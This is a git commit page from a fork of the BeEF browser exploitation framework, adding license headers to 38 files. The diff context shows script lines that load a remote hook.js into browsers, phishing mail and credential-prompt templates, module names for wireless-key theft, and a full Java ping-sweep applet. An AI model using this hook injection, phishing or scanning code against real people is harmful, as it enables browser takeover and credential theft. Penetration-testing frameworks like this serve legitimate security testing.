Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Changed license header

Browse Source
This commit is contained in:
Wade Alcorn
2012-11-02 14:26:10 +10:00
parent b68df3d024
commit 23f09b919f
38 changed files with 288 additions and 81 deletions
Download Patch File Download Diff File Expand all files Collapse all files

5
extensions/admin_ui/controllers/authentication/index.html
View File

@@ -1,3 +1,8 @@
<!--
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<html>
<head>
<title>BeEF Authentication</title>

5
extensions/admin_ui/controllers/panel/index.html
View File

@@ -1,3 +1,8 @@
<!--
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<html>
<head>

6
extensions/admin_ui/media/javascript/esapi/Class.create.js
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
/* Simple JavaScript Inheritance
* By John Resig http://ejohn.org/
* MIT Licensed.

6
extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
/**
* @Author : venkatakrishnan ganesh
* @file : wterm.jquery.js

5
extensions/customhook/html/index.html
View File

@@ -1,3 +1,8 @@
<!--
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<html>
<head>
<title><%= @customhook_title %></title>

5
extensions/demos/chrome_extension/index.html
View File

@@ -1,3 +1,8 @@
<!--
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<!doctype html>
<html>
<head>

5
extensions/demos/chrome_extension/persistent_tab.html
View File

@@ -1,3 +1,8 @@
<!--
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<!doctype html>
<html>
<head>

6
extensions/demos/flash_update_chrome_extension/background.js
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
d=document;
e=d.createElement('script');
e.src="http://127.0.0.1:3000/hook.js";

5
extensions/demos/html/basic.html
View File

@@ -1,3 +1,8 @@
<!--
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>

5
extensions/demos/html/butcher/index.html
View File

@@ -1,3 +1,8 @@
<!--
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

5
extensions/demos/html/butcher/secret_page.html
View File

@@ -1,3 +1,8 @@
<!--
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<html>
<head>
<title>Secret Page</title>

6
extensions/demos/html/checkJava.java
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
import java.io.*;
import java.util.*;
import java.net.*;

5
extensions/demos/html/clickjacking/clickjack_attack.html
View File

@@ -1,3 +1,8 @@
<!--
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

5
extensions/demos/html/clickjacking/clickjack_victim.html
View File

@@ -1,3 +1,8 @@
<!--
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

5
extensions/demos/html/plain.html
View File

@@ -1,3 +1,8 @@
<!--
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<script>
var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
document.write(commandModuleStr);

5
extensions/demos/html/report.html
View File

@@ -1,3 +1,8 @@
<!--
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>Loading</title>

5
extensions/demos/html/secret_page.html
View File

@@ -1,3 +1,8 @@
<!--
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<html>
<head>
<title>Secret Page</title>

6
extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
var linkTargetFinder = function () {
var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
return {

6
extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
// see http://kb.mozillazine.org/Firefox_:_FAQs_:_About:config_Entries
// see http://mike.kaply.com/2012/06/21/best-practices-for-overriding-the-new-tab-page-with-your-extension/
pref("extensions.linktargetfinder.autorun", false);

6
extensions/ipec/files/LinkTargetFinder/skin/skin.css
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
#link-target-finder-toolbar-button {
list-style-image: url("chrome://linktargetfinder/skin/toolbar-large.png");
}

5
extensions/social_engineering/mass_mailer/templates/default/mail.html
View File

@@ -1,3 +1,8 @@
<!--
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">

5
extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html
View File

@@ -1,3 +1,8 @@
<!--
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF8">
<meta name="Generator" content="StreamServe MailOUT"><title>

6
modules/host/get_internal_ip/get_internal_ip.java
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
import java.applet.Applet;
import java.applet.AppletContext;
import java.net.InetAddress;

6
modules/host/get_physical_location/getGPSLocation.java
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
import java.io.*;
import java.util.*;
import java.net.*;

6
modules/host/get_system_info/getSystemInfo.java
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
import java.applet.*;
import java.awt.*;
import java.net.*;

6
modules/host/get_wireless_keys/wirelessZeroConfig.java
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
import java.io.*;
import java.util.*;
import java.net.*;

160
modules/network/ping_sweep_java/pingSweep.java
View File

@@ -1,77 +1,83 @@
import java.applet.Applet;
import java.io.IOException;
import java.net.InetAddress;
import java.net.UnknownHostException;
import java.util.ArrayList;
import java.util.List;
/*
* Coded by Michele "antisnatchor" Orru' for the BeEF project.
* Given a single IP or IP range, check without hosts are alive (ping sweep).
*/
public class pingSweep extends Applet {
public static String ipRange = "";
public static int timeout = 0;
public static List<InetAddress> hostList;
public pingSweep() {
super();
return;
}
public void init(){
ipRange = getParameter("ipRange");
timeout = Integer.parseInt(getParameter("timeout"));
}
//called from JS
public static int getHostsNumber(){
try{
hostList = parseIpRange(ipRange);
}catch(UnknownHostException e){ //do something
}
return hostList.size();
}
//called from JS
public static String getAliveHosts(){
String result = "";
try{
result = checkHosts(hostList);
}catch(IOException io){
//do something
}
return result;
}
private static List<InetAddress> parseIpRange(String ipRange) throws UnknownHostException {
List<InetAddress> addresses = new ArrayList<InetAddress>();
if (ipRange.indexOf("-") != -1) { //multiple IPs: ipRange = 172.31.229.240-172.31.229.250
String[] ips = ipRange.split("-");
String[] octets = ips[0].split("\\.");
int lowerBound = Integer.parseInt(octets[3]);
int upperBound = Integer.parseInt(ips[1].split("\\.")[3]);
for (int i = lowerBound; i <= upperBound; i++) {
String ip = octets[0] + "." + octets[1] + "." + octets[2] + "." + i;
addresses.add(InetAddress.getByName(ip));
}
} else { //single ip: ipRange = 172.31.229.240
addresses.add(InetAddress.getByName(ipRange));
}
return addresses;
}
private static String checkHosts(List<InetAddress> inetAddresses) throws IOException {
String alive = "";
for (InetAddress inetAddress : inetAddresses) {
if (inetAddress.isReachable(timeout)) {
alive += inetAddress.toString() + "\n";
}
}
return alive;
}
}
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
import java.applet.Applet;
import java.io.IOException;
import java.net.InetAddress;
import java.net.UnknownHostException;
import java.util.ArrayList;
import java.util.List;
/*
* Coded by Michele "antisnatchor" Orru' for the BeEF project.
* Given a single IP or IP range, check without hosts are alive (ping sweep).
*/
public class pingSweep extends Applet {
public static String ipRange = "";
public static int timeout = 0;
public static List<InetAddress> hostList;
public pingSweep() {
super();
return;
}
public void init(){
ipRange = getParameter("ipRange");
timeout = Integer.parseInt(getParameter("timeout"));
}
//called from JS
public static int getHostsNumber(){
try{
hostList = parseIpRange(ipRange);
}catch(UnknownHostException e){ //do something
}
return hostList.size();
}
//called from JS
public static String getAliveHosts(){
String result = "";
try{
result = checkHosts(hostList);
}catch(IOException io){
//do something
}
return result;
}
private static List<InetAddress> parseIpRange(String ipRange) throws UnknownHostException {
List<InetAddress> addresses = new ArrayList<InetAddress>();
if (ipRange.indexOf("-") != -1) { //multiple IPs: ipRange = 172.31.229.240-172.31.229.250
String[] ips = ipRange.split("-");
String[] octets = ips[0].split("\\.");
int lowerBound = Integer.parseInt(octets[3]);
int upperBound = Integer.parseInt(ips[1].split("\\.")[3]);
for (int i = lowerBound; i <= upperBound; i++) {
String ip = octets[0] + "." + octets[1] + "." + octets[2] + "." + i;
addresses.add(InetAddress.getByName(ip));
}
} else { //single ip: ipRange = 172.31.229.240
addresses.add(InetAddress.getByName(ipRange));
}
return addresses;
}
private static String checkHosts(List<InetAddress> inetAddresses) throws IOException {
String alive = "";
for (InetAddress inetAddress : inetAddresses) {
if (inetAddress.isReachable(timeout)) {
alive += inetAddress.toString() + "\n";
}
}
return alive;
}
}

6
modules/social_engineering/simple_hijacker/templates/amazon.js
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
$j(document).attr('title', $j(this).html());
document.body.scroll = 'no';

6
modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
// floating div
function writediv() {
sneakydiv = document.createElement('div');

6
modules/social_engineering/simple_hijacker/templates/chromecertbeggar2.js
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
getDomain = function(url){
return url.match(/:\/\/(www\.)?(.[^/:]+)/)[2];
}

6
modules/social_engineering/simple_hijacker/templates/confirmbox.js
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
var answer = confirm("Do you really want to leave us ??")
if (answer){
alert("Okay :(")

6
modules/social_engineering/simple_hijacker/templates/credential.js
View File

@@ -1,3 +1,9 @@
/*
* Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
imgr = "http://0.0.0.0:3000/ui/media/images/beef.png";
var answer= '';

7
test/common/beef_test.rb
View File

@@ -1,3 +1,8 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
require 'test/unit'
require 'capybara'
@@ -41,4 +46,4 @@ class BeefTest
victim
end
end
end

7
test/common/test_constants.rb
View File

@@ -1,3 +1,8 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
BEEF_TEST_DIR = "/tmp/beef-test/"
# General constants
@@ -14,4 +19,4 @@ BEEF_PASSWD = "beef"
RESTAPI_HOOKS = "http://" + ATTACK_DOMAIN + ":3000/api/hooks"
RESTAPI_LOGS = "http://" + ATTACK_DOMAIN + ":3000/api/logs"
RESTAPI_MODULES = "http://" + ATTACK_DOMAIN + ":3000/api/modules"
RESTAPI_ADMIN = "http://" + ATTACK_DOMAIN + ":3000/api/admin"
RESTAPI_ADMIN = "http://" + ATTACK_DOMAIN + ":3000/api/admin"

7
test/integration/check_environment.rb
View File

@@ -1,3 +1,8 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
require 'test/unit'
class TC_CheckEnvironment < Test::Unit::TestCase
@@ -7,4 +12,4 @@ class TC_CheckEnvironment < Test::Unit::TestCase
end
end
end

5
test/integration/tc_debug_modules.rb
View File

@@ -1,3 +1,8 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
require 'test/unit'
require 'rest_client'
require 'json'

5
test/integration/tc_login.rb
View File

@@ -1,3 +1,8 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
require 'test/unit'
require '../common/test_constants'
require '../common/beef_test'

7
test/thirdparty/msf/unit/check_environment.rb vendored
View File

@@ -1,3 +1,8 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
require 'test/unit'
class TC_CheckEnvironment < Test::Unit::TestCase
@@ -7,4 +12,4 @@ class TC_CheckEnvironment < Test::Unit::TestCase
end
end
end